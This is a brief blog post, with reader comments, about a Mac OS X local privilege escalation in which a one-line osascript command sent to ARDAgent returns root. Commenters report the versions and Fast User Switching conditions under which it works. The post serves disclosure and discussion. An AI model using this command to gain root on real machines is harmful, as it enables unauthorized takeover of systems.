Apple gets Pwned

$ osascript -e 'tell app "ARDAgent" to do shell script "whoami"'
root

Wow. A one line script that allows any logged in user to grab root, not even a buffer overflow or third party software involved. This is movie plot hacking at its finest. I haven’t seen an attack this bad in years.

The only thing I would imagine that could be worse would be if you could execute this attack remotely.

4 Responses to “Apple gets Pwned”

  1. Rand Says:

    Doesn’t work on 10.4.9.

  2. Faria Says:

    yep, doesn’t work in Tiger… but works every time in Leopard. Impressive. I hope you have reported it to Apple ?

  3. Elliotte Rusty Harold Says:

    I’ve verified it on Leopard and I’m told it works on Tiger, though I haven’t personally checked that.

    There are a couple of things that may cause it to fail. If Fast User Switching is disabled, or if you’ve logged into an account via Fast user switching, then I don’t think this works. Otherwise I think it does.

  4. Evan Says:

    I have Fast User Switching enabled, but I logged into my account via Fast User Switching — it works on 10.5.3 under this scenario :(

Leave a Reply